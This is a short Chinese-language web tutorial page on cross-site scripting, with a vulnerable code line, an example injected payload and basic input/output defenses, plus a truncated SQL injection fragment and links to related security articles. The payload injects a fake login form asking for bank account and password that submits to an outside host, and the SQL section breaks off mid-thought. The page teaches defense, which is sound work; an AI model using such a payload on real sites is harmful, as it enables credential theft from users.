XSS漏洞攻擊與防止辦法

xss漏洞攻擊與防止辦法
xss又叫css教程 (cross site script) ,跨站腳本攻擊。它指的是惡意攻擊者往web頁面裏插入惡意html代碼,當用戶浏覽該頁之時,嵌入其中web裏面的html代碼會被執行,從而達到惡意攻擊用戶的特殊目的。

源頁面放一個標簽,在後台page_load裏面寫this.textlabel.text = request["msg"];

構建攻擊,讓攻擊後把數據傳遞到目標頁

構建代碼如下:

msg=<form action='http://www.111cn.net' method='get'>銀行賬號:<input type='text' name='id'/>密碼:<input type='text' name='pwd'/><input type='submit' value='login'/></form>

、解決辦法
最重要的一點,就是提高意識嚴格控制輸入和輸出。具體執行的方式有以下幾點:

第一、在輸入方面對所有用戶提交內容進行可靠的輸入驗證,提交內容包括url、查詢關鍵字、http頭、post數據等
第二、在輸出方面,在用戶輸內容中使用<xmp>標簽。標簽內的內容不會解釋,直接顯示。
第三、嚴格執行字符輸入字數控制。
第四、在腳本執行區中,應絕無用戶輸入。

=====================================================
sql注入
加入用戶提交的 內容裏面 含有 ; 號,那麽sql語句會被截斷....然後,後果就

頁面載入完畢後,執行login

更多相關文章
  • 很多人沒事就拿一些掃描機掃描ssh端口,然後試圖連接ssh端口進行暴力破解(窮舉掃描),所以建議vps主機的空間,盡量設置複雜的ssh登錄密碼,雖然在前段時間曾經介紹過Linux VPS禁止某個IP訪問使用hosts.deny禁止某些IP訪問,但是功能方面欠缺,如:不能自動屏蔽,那麽有什麽更好的辦法
  • 伺服器ARP攻擊與防範方法總結
    伺服器ARP攻擊是一些人用來攻擊一些伺服器常用手段了,這種方法算是比較低級的方法,我們可以簡單的通過一些處理解決解決伺服器ARP攻擊,下面我來介紹arp防範方法總結ARP欺騙原理:在區域網路中,通信前必須通過ARP協定來完成IP地址轉換爲第二層物理地址(即MAC地址).ARP協定對網路安全具有重要的 ...
  • 街機雷電2015HD攻擊與躲避彈幕技巧一覽
    在街機雷電2015HD的這一款遊戲裏面,玩家們可以說時常都能遇見滿屏的子彈,讓玩家們措手不及,只能選擇硬抗了,那麽到底有沒有什麽方法能夠躲避的呢?今天小編就來給大家分享一下躲避彈幕的一些技巧,下面就一起來看看吧.給各位街機雷電2015HD的玩家們分享一下在攻擊的同時與進行躲避彈幕的一些小技巧.技巧一
  • CC攻擊攻擊的原因就是不停的刷新動態頁面如php+mysql讀寫數據庫的頁面,這樣如果刷新比較快可以導致頁面卡死或伺服器資源使用超量,從而導致伺服器挂了,下面給大家整理了一些防止CC攻擊的例子.CC攻擊原因CC攻擊的原理就是攻擊者控制某些主機不停地發大量數據包給對方伺服器造成伺服器資源耗盡,一直到宕 ...
  • 很多站長會發現使用dz或其它mysql網站時如果使用的iis+php我們經常會發現w3wp.exe mysqld.exe進程CPU反複100%問題了,下面我雖然不能幫你解決辦法,但從多方面分析了問題與排序辦法,大家可參考一下.說點關于W3WP.EXE的知識. Q : W3WP.EXE,應用程序,應用 ...
  • Windowns 10系統網路連接受限怎麽辦 win10網路連接受限解決辦法
    網路連接受限小編見過最多的就是IP地址問題,但在win10系統網路連接受限是什麽原因呢?下面可以和111cn小編來看看具體的解決與排除辦法吧.1.右擊任務欄上的“網路連接”然後點擊“網路和共享中心”如下圖所示. 2.在“網路和共享中心”我們點擊左邊的一個“更改適配器設置”選項,打開 3.然後在進入到 ...
  • 在linux系統中防止syn攻擊我們可以使用iptalbes防火牆強阻止就差不多了,下面我來給大家介紹centos防止syn攻擊(DDOS攻擊)與防止各種端口掃描的一些實例.防止syn攻擊(DDOOS攻擊的一種) 代碼如下 iptables -I INPUT -p tcp --syn -m limi ...
  • 使用WordPress3.7升級時導致其它網站暫時不能訪問了,如果我們訪問會提示"Briefly unavailable for scheduled maintenance. Check back in a minute"(正在執行例行維護,請一分鍾後回來") ,錯誤了 ...
一周排行